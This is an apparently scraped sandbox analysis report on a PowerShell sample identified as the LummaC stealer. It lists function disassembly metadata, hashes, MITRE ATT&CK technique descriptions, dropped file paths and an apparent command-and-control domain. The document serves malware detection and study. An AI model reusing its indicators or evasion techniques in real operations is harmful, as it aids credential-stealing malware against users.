Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: d2fee14edd0500f725afffcf39899ce857735905c9429697276ebcb90cba13ee
Instruction ID: d04e3146d9e892a4df60aed18dfcf7000303f8fe52de01a13bdd9b618f0ad191
Opcode Fuzzy Hash: d2fee14edd0500f725afffcf39899ce857735905c9429697276ebcb90cba13ee
Instruction Fuzzy Hash: 50819E76A003059BDB10DF6DD8806DEBBF0FF88340F15866AE899AB254D330E9D58B91

Function 6C528D40 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

Unknown pseudo relocation bit size %d., xrefs: 6C528EAD
%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C528E60
Unknown pseudo relocation protocol version %d., xrefs: 6C529033

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 7585f5a45fc4a565274420fd68d57267d307a409aa8148a2963c89db7c7ec825
Instruction ID: b4c483afe87f72d27641e73319fc09c0dfd6d96fdda6c80bea46f552bc2b7a7f
Opcode Fuzzy Hash: 7585f5a45fc4a565274420fd68d57267d307a409aa8148a2963c89db7c7ec825
Instruction Fuzzy Hash: C17192B3A15645CBDB10CF98CC8078EB7F5BB85354F15861BD854ABB84E338E905CB82

Function 0144E042 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 327COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0144E04E

Strings

>, xrefs: 0144E3F1
&j=, xrefs: 0144E1DE
lackadausaz.click, xrefs: 0144E47B

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: >$&j=$lackadausaz.click
API String ID: 3861434553-1851139727
Opcode ID: 434457976ce513404db294d1b02181296684c80020b6d1490de880e55935a9bb
Instruction ID: 0351371e49362bb1cd03c9551c2dd7442741386a71ff6db128f78a9a2d78d324
Opcode Fuzzy Hash: 434457976ce513404db294d1b02181296684c80020b6d1490de880e55935a9bb
Instruction Fuzzy Hash: DEA1EC7150D3928BE3358F29D4947ABBBE2BFD2300F28995DC4D96B365D739040ACB92

Function 00A11001 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 00A1106B
__p__fmode.MSVCRT ref: 00A11070
__p__commode.MSVCRT ref: 00A1107D

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: __p__commode__p__fmode__set_app_type
String ID:
API String ID: 3338496922-0
Opcode ID: e6f0e2504201bc4e8695e7eabc40c21db8c4b49415d0b1ea1bedd1b132296f8f
Instruction ID: d8198af745877da4466734635a7a51a25c5a7a5f48c15e2d7afdae95e9c646ac
Opcode Fuzzy Hash: e6f0e2504201bc4e8695e7eabc40c21db8c4b49415d0b1ea1bedd1b132296f8f
Instruction Fuzzy Hash: 9821EE74A04242CFC710EF64E9113E533F0BB0C308F54C928C1494B65AEB7AD8CADBA1

Function 0147328C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 014732DA
GetSystemMetrics.USER32 ref: 014732E9

Strings

, xrefs: 014733BD

Memory Dump Source

Source File: 00000002.00000002.1818319363.0000000001440000.00000040.00001000.00020000.00000000.sdmp, Offset: 01440000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1440000_ronwod.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: dfe2825b39e528a52b184107fdd779b653d91b68f640545161c03b63ff749a1b
Instruction ID: 59c588f8472463b1548a66769c74506e20005cf981a74f01f5c655204ab57b22
Opcode Fuzzy Hash: dfe2825b39e528a52b184107fdd779b653d91b68f640545161c03b63ff749a1b
Instruction Fuzzy Hash: 4C5193B4E142099FCB50EFACD985A9DBBF0BB48310F10852EE898E7354D774A945CF92

Function 00A13D10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00A13D7E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00A13D5F
Unknown error, xrefs: 00A13D12

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 8994c2d710678cdf0400ae1533c97d9bf1564d771903b12a8800dfbd9cac33ca
Instruction ID: 1eafe6046d93e8c4c0bb937686e9de344d0df1c5b160bfc94890ce3e9e187c81
Opcode Fuzzy Hash: 8994c2d710678cdf0400ae1533c97d9bf1564d771903b12a8800dfbd9cac33ca
Instruction Fuzzy Hash: 9701D2B0408B45DBC300AF15E58845AFFF1FF89350F828898E5C547269CB32D8B8C746

Function 00A11296 Relevance: 5.1, APIs: 4, Instructions: 80stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00A112EB
strlen.MSVCRT ref: 00A11323
malloc.MSVCRT ref: 00A1132E
memcpy.MSVCRT ref: 00A11344

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: c954f85ef7679b755cd523051f5a1bdde92d260bd2bfd67d972b4f39176cef37
Instruction ID: c5bae13206ecff8c7039d7805a9b445c9023dd6dc2d13021dc9a9a78043be52b
Opcode Fuzzy Hash: c954f85ef7679b755cd523051f5a1bdde92d260bd2bfd67d972b4f39176cef37
Instruction Fuzzy Hash: 6C3117B59087198FCB10DFA8D9803D9B7F1FB48300F15852DDA8597311DB75A98ACF81

Function 00A113BB Relevance: 5.1, APIs: 4, Instructions: 66stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00A112EB
strlen.MSVCRT ref: 00A11323
malloc.MSVCRT ref: 00A1132E
memcpy.MSVCRT ref: 00A11344

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: malloc$memcpystrlen
String ID:
API String ID: 3553820921-0
Opcode ID: 120173aca2c91c7cfaf6091c6791e0a3c11a092dd8625c8dfd459733af91f507
Instruction ID: c2df8b32c3075c36ee34821a402768ffa52d50924032c5930e24af961a747db9
Opcode Fuzzy Hash: 120173aca2c91c7cfaf6091c6791e0a3c11a092dd8625c8dfd459733af91f507
Instruction Fuzzy Hash: 6221D5B5D087158FCB14DFA8D9806D9B7F1FB88310B11892ED99597311DB34A986CF81

Function 6C529040 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C52904E
TlsGetValue.KERNEL32 ref: 6C529075
GetLastError.KERNEL32 ref: 6C52907C
LeaveCriticalSection.KERNEL32 ref: 6C52909C

Memory Dump Source

Source File: 00000002.00000002.1818935697.000000006C521000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000002.00000002.1818919125.000000006C520000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1818951468.000000006C52A000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819015645.000000006C575000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819047037.000000006C5BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819061747.000000006C5C0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819075730.000000006C5C4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000002.00000002.1819119862.000000006C5C7000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6c520000_ronwod.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 5bf383f326160abb94383368a9fbac357d743b840316327b7891b635c5dec4ca
Instruction ID: 3078f24772f5a7e3e58c04430e7746be746d7c5fd82fccce0fb20da641addcf5
Opcode Fuzzy Hash: 5bf383f326160abb94383368a9fbac357d743b840316327b7891b635c5dec4ca
Instruction Fuzzy Hash: D8F0AFB27046058FDB00BFB9DC8995BBBB4FA55754B06052CDD845B704E731E909CBA3

Function 00A14460 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00A14633,?,?,?,?,?,00A13C48), ref: 00A1446E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00A14633,?,?,?,?,?,00A13C48), ref: 00A14495
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00A14633,?,?,?,?,?,00A13C48), ref: 00A1449C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00A14633,?,?,?,?,?,00A13C48), ref: 00A144BC

Memory Dump Source

Source File: 00000002.00000002.1818028568.0000000000A11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.1818009862.0000000000A10000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818070243.0000000000A16000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818091923.0000000000A19000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818105077.0000000000A1C000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1818120780.0000000000A1D000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_ronwod.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: dee2445411acc743da4b72ea32c724d646fbfc7044bb97c60eeb63b99c60922b
Instruction ID: 2b8dc27d36ec6b55b0ab175d95f80d1e555ac84c7f5be48cbd1d083b42a08197
Opcode Fuzzy Hash: dee2445411acc743da4b72ea32c724d646fbfc7044bb97c60eeb63b99c60922b
Instruction Fuzzy Hash: 7DF0A4B59003159BC720FFB8E98869B7BA4EB48750B094168DD4947308D734ACC9CBA2

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lumma.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\extract\cr.dll

C:\ProgramData\extract\ronwod.exe

C:\ProgramData\pakgea.zip

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppr24bc0.r13.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q23quk4v.xsq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfp0m4xw.smg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tfd2pkkg.lh3.psm1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HJ41T1IMU51P11GG09DF.temp

Static File Info

General

File Icon

Windows Analysis Report
lumma.ps1

Function 6C524FC9 Relevance: 72.6, APIs: 2, Strings: 39, Instructions: 894
nativememoryCOMMON

Function 6C5271D6 Relevance: 57.3, Strings: 45, Instructions: 1043
COMMON

Function 6C523B00 Relevance: 52.8, APIs: 1, Strings: 29, Instructions: 317
nativeCOMMON

Function 6C526371 Relevance: 45.8, APIs: 1, Strings: 25, Instructions: 326
libraryloaderCOMMON

Function 00A1346D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 373
COMMON

Function 0144CC75 Relevance: 30.2, Strings: 24, Instructions: 243
COMMON

Function 01449C6F Relevance: 6.4, Strings: 5, Instructions: 150
COMMON

Function 0144A8B0 Relevance: 4.1, Strings: 3, Instructions: 349
COMMON

Function 0147D0D9 Relevance: 2.6, Strings: 2, Instructions: 135
COMMON

Function 014486C0 Relevance: 7.6, APIs: 5, Instructions: 92
threadCOMMON

Function 0144E6BA Relevance: 2.5, APIs: 2, Instructions: 12
COMMON

Function 01476B2D Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 0144CC13 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON